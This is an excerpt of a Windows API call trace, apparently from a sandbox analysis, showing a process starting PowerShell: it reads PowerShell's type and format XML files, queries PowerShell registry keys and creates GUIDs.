	[0769.794] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x330
	[0769.794] GetFileType (hFile=0x330) returned 0x1
	[0769.794] SetErrorMode (uMode=0x1) returned 0x1
	[0769.794] GetFileType (hFile=0x330) returned 0x1
	[0769.794] ReadFile (in: hFile=0x330, lpBuffer=0x2ceb3e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d668, lpOverlapped=0x0 | out: lpBuffer=0x2ceb3e0*, lpNumberOfBytesRead=0x16d668*=0x1000, lpOverlapped=0x0) returned 1
	[0769.796] ReadFile (in: hFile=0x330, lpBuffer=0x2ceb3e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d668, lpOverlapped=0x0 | out: lpBuffer=0x2ceb3e0*, lpNumberOfBytesRead=0x16d668*=0x1000, lpOverlapped=0x0) returned 1
	[0770.343] ReadFile (in: hFile=0x330, lpBuffer=0x2ceb3e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d668, lpOverlapped=0x0 | out: lpBuffer=0x2ceb3e0*, lpNumberOfBytesRead=0x16d668*=0x1000, lpOverlapped=0x0) returned 1
	[0770.344] ReadFile (in: hFile=0x330, lpBuffer=0x2ceb3e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d668, lpOverlapped=0x0 | out: lpBuffer=0x2ceb3e0*, lpNumberOfBytesRead=0x16d668*=0x1000, lpOverlapped=0x0) returned 1
	[0770.344] ReadFile (in: hFile=0x330, lpBuffer=0x2ceb3e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d668, lpOverlapped=0x0 | out: lpBuffer=0x2ceb3e0*, lpNumberOfBytesRead=0x16d668*=0x1000, lpOverlapped=0x0) returned 1
	[0770.345] ReadFile (in: hFile=0x330, lpBuffer=0x2ceb3e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d668, lpOverlapped=0x0 | out: lpBuffer=0x2ceb3e0*, lpNumberOfBytesRead=0x16d668*=0x1000, lpOverlapped=0x0) returned 1
	[0770.346] ReadFile (in: hFile=0x330, lpBuffer=0x2ceb3e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d668, lpOverlapped=0x0 | out: lpBuffer=0x2ceb3e0*, lpNumberOfBytesRead=0x16d668*=0x1000, lpOverlapped=0x0) returned 1
	[0770.346] ReadFile (in: hFile=0x330, lpBuffer=0x2ceb3e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d668, lpOverlapped=0x0 | out: lpBuffer=0x2ceb3e0*, lpNumberOfBytesRead=0x16d668*=0x1000, lpOverlapped=0x0) returned 1
	[0770.346] ReadFile (in: hFile=0x330, lpBuffer=0x2ceb3e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d668, lpOverlapped=0x0 | out: lpBuffer=0x2ceb3e0*, lpNumberOfBytesRead=0x16d668*=0x1000, lpOverlapped=0x0) returned 1
	[0770.348] ReadFile (in: hFile=0x330, lpBuffer=0x2ceb3e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d668, lpOverlapped=0x0 | out: lpBuffer=0x2ceb3e0*, lpNumberOfBytesRead=0x16d668*=0x1000, lpOverlapped=0x0) returned 1
	[0770.348] ReadFile (in: hFile=0x330, lpBuffer=0x2ceb3e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d668, lpOverlapped=0x0 | out: lpBuffer=0x2ceb3e0*, lpNumberOfBytesRead=0x16d668*=0x1000, lpOverlapped=0x0) returned 1
	[0770.349] ReadFile (in: hFile=0x330, lpBuffer=0x2ceb3e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d668, lpOverlapped=0x0 | out: lpBuffer=0x2ceb3e0*, lpNumberOfBytesRead=0x16d668*=0x1000, lpOverlapped=0x0) returned 1
	[0770.349] ReadFile (in: hFile=0x330, lpBuffer=0x2ceb3e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d668, lpOverlapped=0x0 | out: lpBuffer=0x2ceb3e0*, lpNumberOfBytesRead=0x16d668*=0x1000, lpOverlapped=0x0) returned 1
	[0770.349] ReadFile (in: hFile=0x330, lpBuffer=0x2ceb3e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d668, lpOverlapped=0x0 | out: lpBuffer=0x2ceb3e0*, lpNumberOfBytesRead=0x16d668*=0x1000, lpOverlapped=0x0) returned 1
	[0770.350] ReadFile (in: hFile=0x330, lpBuffer=0x2ceb3e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d668, lpOverlapped=0x0 | out: lpBuffer=0x2ceb3e0*, lpNumberOfBytesRead=0x16d668*=0x1000, lpOverlapped=0x0) returned 1
	[0770.350] ReadFile (in: hFile=0x330, lpBuffer=0x2ceb3e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d668, lpOverlapped=0x0 | out: lpBuffer=0x2ceb3e0*, lpNumberOfBytesRead=0x16d668*=0x1000, lpOverlapped=0x0) returned 1
	[0770.350] ReadFile (in: hFile=0x330, lpBuffer=0x2ceb3e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d668, lpOverlapped=0x0 | out: lpBuffer=0x2ceb3e0*, lpNumberOfBytesRead=0x16d668*=0x1000, lpOverlapped=0x0) returned 1
	[0770.353] ReadFile (in: hFile=0x330, lpBuffer=0x2ceb3e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d668, lpOverlapped=0x0 | out: lpBuffer=0x2ceb3e0*, lpNumberOfBytesRead=0x16d668*=0x1000, lpOverlapped=0x0) returned 1
	[0770.353] ReadFile (in: hFile=0x330, lpBuffer=0x2ceb3e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d668, lpOverlapped=0x0 | out: lpBuffer=0x2ceb3e0*, lpNumberOfBytesRead=0x16d668*=0x1000, lpOverlapped=0x0) returned 1
	[0770.354] ReadFile (in: hFile=0x330, lpBuffer=0x2ceb3e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d668, lpOverlapped=0x0 | out: lpBuffer=0x2ceb3e0*, lpNumberOfBytesRead=0x16d668*=0x1000, lpOverlapped=0x0) returned 1
	[0770.354] ReadFile (in: hFile=0x330, lpBuffer=0x2ceb3e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d668, lpOverlapped=0x0 | out: lpBuffer=0x2ceb3e0*, lpNumberOfBytesRead=0x16d668*=0x1000, lpOverlapped=0x0) returned 1
	[0770.355] ReadFile (in: hFile=0x330, lpBuffer=0x2ceb3e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d668, lpOverlapped=0x0 | out: lpBuffer=0x2ceb3e0*, lpNumberOfBytesRead=0x16d668*=0x1000, lpOverlapped=0x0) returned 1
	[0770.355] ReadFile (in: hFile=0x330, lpBuffer=0x2ceb3e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d668, lpOverlapped=0x0 | out: lpBuffer=0x2ceb3e0*, lpNumberOfBytesRead=0x16d668*=0x1000, lpOverlapped=0x0) returned 1
	[0770.355] ReadFile (in: hFile=0x330, lpBuffer=0x2ceb3e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d668, lpOverlapped=0x0 | out: lpBuffer=0x2ceb3e0*, lpNumberOfBytesRead=0x16d668*=0x1000, lpOverlapped=0x0) returned 1
	[0770.356] ReadFile (in: hFile=0x330, lpBuffer=0x2ceb3e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d668, lpOverlapped=0x0 | out: lpBuffer=0x2ceb3e0*, lpNumberOfBytesRead=0x16d668*=0x1000, lpOverlapped=0x0) returned 1
	[0770.356] ReadFile (in: hFile=0x330, lpBuffer=0x2ceb3e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d668, lpOverlapped=0x0 | out: lpBuffer=0x2ceb3e0*, lpNumberOfBytesRead=0x16d668*=0x1000, lpOverlapped=0x0) returned 1
	[0770.356] ReadFile (in: hFile=0x330, lpBuffer=0x2ceb3e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d668, lpOverlapped=0x0 | out: lpBuffer=0x2ceb3e0*, lpNumberOfBytesRead=0x16d668*=0x1000, lpOverlapped=0x0) returned 1
	[0770.357] ReadFile (in: hFile=0x330, lpBuffer=0x2ceb3e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d668, lpOverlapped=0x0 | out: lpBuffer=0x2ceb3e0*, lpNumberOfBytesRead=0x16d668*=0x1000, lpOverlapped=0x0) returned 1
	[0770.357] ReadFile (in: hFile=0x330, lpBuffer=0x2ceb3e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d668, lpOverlapped=0x0 | out: lpBuffer=0x2ceb3e0*, lpNumberOfBytesRead=0x16d668*=0x1000, lpOverlapped=0x0) returned 1
	[0770.357] ReadFile (in: hFile=0x330, lpBuffer=0x2ceb3e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d668, lpOverlapped=0x0 | out: lpBuffer=0x2ceb3e0*, lpNumberOfBytesRead=0x16d668*=0x1000, lpOverlapped=0x0) returned 1
	[0770.358] ReadFile (in: hFile=0x330, lpBuffer=0x2ceb3e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d668, lpOverlapped=0x0 | out: lpBuffer=0x2ceb3e0*, lpNumberOfBytesRead=0x16d668*=0x1000, lpOverlapped=0x0) returned 1
	[0770.358] ReadFile (in: hFile=0x330, lpBuffer=0x2ceb3e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d668, lpOverlapped=0x0 | out: lpBuffer=0x2ceb3e0*, lpNumberOfBytesRead=0x16d668*=0x1000, lpOverlapped=0x0) returned 1
	[0770.358] ReadFile (in: hFile=0x330, lpBuffer=0x2ceb3e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d668, lpOverlapped=0x0 | out: lpBuffer=0x2ceb3e0*, lpNumberOfBytesRead=0x16d668*=0x1000, lpOverlapped=0x0) returned 1
	[0770.364] ReadFile (in: hFile=0x330, lpBuffer=0x2ceb3e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d668, lpOverlapped=0x0 | out: lpBuffer=0x2ceb3e0*, lpNumberOfBytesRead=0x16d668*=0x1000, lpOverlapped=0x0) returned 1
	[0770.365] ReadFile (in: hFile=0x330, lpBuffer=0x2ceb3e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d668, lpOverlapped=0x0 | out: lpBuffer=0x2ceb3e0*, lpNumberOfBytesRead=0x16d668*=0x1000, lpOverlapped=0x0) returned 1
	[0770.365] ReadFile (in: hFile=0x330, lpBuffer=0x2ceb3e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d668, lpOverlapped=0x0 | out: lpBuffer=0x2ceb3e0*, lpNumberOfBytesRead=0x16d668*=0x1000, lpOverlapped=0x0) returned 1
	[0770.365] ReadFile (in: hFile=0x330, lpBuffer=0x2ceb3e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d668, lpOverlapped=0x0 | out: lpBuffer=0x2ceb3e0*, lpNumberOfBytesRead=0x16d668*=0x1000, lpOverlapped=0x0) returned 1
	[0770.366] ReadFile (in: hFile=0x330, lpBuffer=0x2ceb3e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d668, lpOverlapped=0x0 | out: lpBuffer=0x2ceb3e0*, lpNumberOfBytesRead=0x16d668*=0x1000, lpOverlapped=0x0) returned 1
	[0770.366] ReadFile (in: hFile=0x330, lpBuffer=0x2ceb3e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d668, lpOverlapped=0x0 | out: lpBuffer=0x2ceb3e0*, lpNumberOfBytesRead=0x16d668*=0x1000, lpOverlapped=0x0) returned 1
	[0770.367] ReadFile (in: hFile=0x330, lpBuffer=0x2ceb3e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d668, lpOverlapped=0x0 | out: lpBuffer=0x2ceb3e0*, lpNumberOfBytesRead=0x16d668*=0x1000, lpOverlapped=0x0) returned 1
	[0770.367] ReadFile (in: hFile=0x330, lpBuffer=0x2ceb3e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d668, lpOverlapped=0x0 | out: lpBuffer=0x2ceb3e0*, lpNumberOfBytesRead=0x16d668*=0x1000, lpOverlapped=0x0) returned 1
	[0770.367] ReadFile (in: hFile=0x330, lpBuffer=0x2ceb3e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d668, lpOverlapped=0x0 | out: lpBuffer=0x2ceb3e0*, lpNumberOfBytesRead=0x16d668*=0x1b4, lpOverlapped=0x0) returned 1
	[0770.367] ReadFile (in: hFile=0x330, lpBuffer=0x2ceb3e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d668, lpOverlapped=0x0 | out: lpBuffer=0x2ceb3e0*, lpNumberOfBytesRead=0x16d668*=0x0, lpOverlapped=0x0) returned 1
	[0770.368] CloseHandle (hObject=0x330) returned 1
	[0770.368] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0770.368] SetErrorMode (uMode=0x1) returned 0x1
	[0770.368] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d5e0 | out: lpFileInformation=0x16d5e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0770.368] SetErrorMode (uMode=0x1) returned 0x1
	[0770.368] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0770.368] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d6c8 | out: phkResult=0x16d6c8*=0x330) returned 0x0
	[0770.369] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d64c, lpData=0x0, lpcbData=0x16d648*=0x0 | out: lpType=0x16d64c*=0x1, lpData=0x0, lpcbData=0x16d648*=0x56) returned 0x0
	[0770.369] CoTaskMemAlloc (cb=0x5a) returned 0x1b7376f0
	[0770.369] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d61c, lpData=0x1b7376f0, lpcbData=0x16d618*=0x56 | out: lpType=0x16d61c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d618*=0x56) returned 0x0
	[0770.369] CoTaskMemFree (pv=0x1b7376f0) 
	[0770.369] RegCloseKey (hKey=0x330) returned 0x0
	[0770.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0770.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0779.396] CoTaskMemAlloc (cb=0x104) returned 0x1b742240
	[0779.396] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0779.396] CoTaskMemFree (pv=0x1b742240) 
	[0783.677] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d868 | out: phkResult=0x16d868*=0x318) returned 0x0
	[0783.677] RegQueryValueExW (in: hKey=0x318, lpValueName="path", lpReserved=0x0, lpType=0x16d87c, lpData=0x0, lpcbData=0x16d878*=0x0 | out: lpType=0x16d87c*=0x1, lpData=0x0, lpcbData=0x16d878*=0x74) returned 0x0
	[0783.677] RegQueryValueExW (in: hKey=0x318, lpValueName="path", lpReserved=0x0, lpType=0x16d7ec, lpData=0x0, lpcbData=0x16d7e8*=0x0 | out: lpType=0x16d7ec*=0x1, lpData=0x0, lpcbData=0x16d7e8*=0x74) returned 0x0
	[0783.677] CoTaskMemAlloc (cb=0x78) returned 0x2e02d0
	[0783.677] RegQueryValueExW (in: hKey=0x318, lpValueName="path", lpReserved=0x0, lpType=0x16d7bc, lpData=0x2e02d0, lpcbData=0x16d7b8*=0x74 | out: lpType=0x16d7bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x16d7b8*=0x74) returned 0x0
	[0783.677] CoTaskMemFree (pv=0x2e02d0) 
	[0783.677] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x16d530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0783.677] SetErrorMode (uMode=0x1) returned 0x1
	[0783.677] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x16d740 | out: lpFileInformation=0x16d740*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0783.678] SetErrorMode (uMode=0x1) returned 0x1
	[0783.678] CoTaskMemAlloc (cb=0x104) returned 0x1b742240
	[0783.678] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0783.678] CoTaskMemFree (pv=0x1b742240) 
	[0783.683] CoTaskMemAlloc (cb=0x104) returned 0x1b742240
	[0783.683] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0783.683] CoTaskMemFree (pv=0x1b742240) 
	[0783.685] CoTaskMemAlloc (cb=0x104) returned 0x1b742240
	[0783.685] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0783.685] CoTaskMemFree (pv=0x1b742240) 
	[0783.686] CoTaskMemAlloc (cb=0x104) returned 0x1b742240
	[0783.686] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0783.686] CoTaskMemFree (pv=0x1b742240) 
	[0783.688] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x16ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0783.688] SetErrorMode (uMode=0x1) returned 0x1
	[0783.688] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x328
	[0783.688] GetFileType (hFile=0x328) returned 0x1
	[0783.688] SetErrorMode (uMode=0x1) returned 0x1
	[0783.688] GetFileType (hFile=0x328) returned 0x1
	[0783.688] ReadFile (in: hFile=0x328, lpBuffer=0x30de7f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x30de7f0*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0783.690] ReadFile (in: hFile=0x328, lpBuffer=0x30de7f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x30de7f0*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0783.690] ReadFile (in: hFile=0x328, lpBuffer=0x30de7f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x30de7f0*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0783.691] ReadFile (in: hFile=0x328, lpBuffer=0x30de7f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x30de7f0*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0783.691] ReadFile (in: hFile=0x328, lpBuffer=0x30de7f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x30de7f0*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0783.700] ReadFile (in: hFile=0x328, lpBuffer=0x30de7f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x30de7f0*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0783.700] ReadFile (in: hFile=0x328, lpBuffer=0x30de7f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x30de7f0*, lpNumberOfBytesRead=0x16d3d8*=0x9e2, lpOverlapped=0x0) returned 1
	[0783.701] ReadFile (in: hFile=0x328, lpBuffer=0x2c0fc5a, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2c0fc5a*, lpNumberOfBytesRead=0x16d3d8*=0x0, lpOverlapped=0x0) returned 1
	[0783.701] ReadFile (in: hFile=0x328, lpBuffer=0x30de7f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x30de7f0*, lpNumberOfBytesRead=0x16d3d8*=0x0, lpOverlapped=0x0) returned 1
	[0783.701] CloseHandle (hObject=0x328) returned 1
	[0783.701] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0783.701] SetErrorMode (uMode=0x1) returned 0x1
	[0783.701] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d380 | out: lpFileInformation=0x16d380*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0783.704] SetErrorMode (uMode=0x1) returned 0x1
	[0783.704] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0783.704] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d468 | out: phkResult=0x16d468*=0x328) returned 0x0
	[0783.705] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d3ec, lpData=0x0, lpcbData=0x16d3e8*=0x0 | out: lpType=0x16d3ec*=0x1, lpData=0x0, lpcbData=0x16d3e8*=0x56) returned 0x0
	[0783.705] CoTaskMemAlloc (cb=0x5a) returned 0x1b736ce0
	[0783.705] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d3bc, lpData=0x1b736ce0, lpcbData=0x16d3b8*=0x56 | out: lpType=0x16d3bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d3b8*=0x56) returned 0x0
	[0783.705] CoTaskMemFree (pv=0x1b736ce0) 
	[0783.705] RegCloseKey (hKey=0x328) returned 0x0
	[0783.705] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0783.705] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0783.714] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0x7dbb076b, Data2=0x2490, Data3=0x497d, Data4=([0]=0x9e, [1]=0xac, [2]=0xd6, [3]=0x88, [4]=0x7e, [5]=0xc4, [6]=0x16, [7]=0x4a))) returned 0x0
	[0784.515] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0x36da56cf, Data2=0x5473, Data3=0x48a4, Data4=([0]=0xa9, [1]=0x6c, [2]=0xb3, [3]=0x18, [4]=0x3e, [5]=0x33, [6]=0xf2, [7]=0x4f))) returned 0x0
	[0784.517] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x328
	[0784.517] GetFileType (hFile=0x328) returned 0x1
	[0784.517] SetErrorMode (uMode=0x1) returned 0x1
	[0784.517] GetFileType (hFile=0x328) returned 0x1
	[0784.517] ReadFile (in: hFile=0x328, lpBuffer=0x2c318e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2c318e0*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0784.517] ReadFile (in: hFile=0x328, lpBuffer=0x2c318e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2c318e0*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
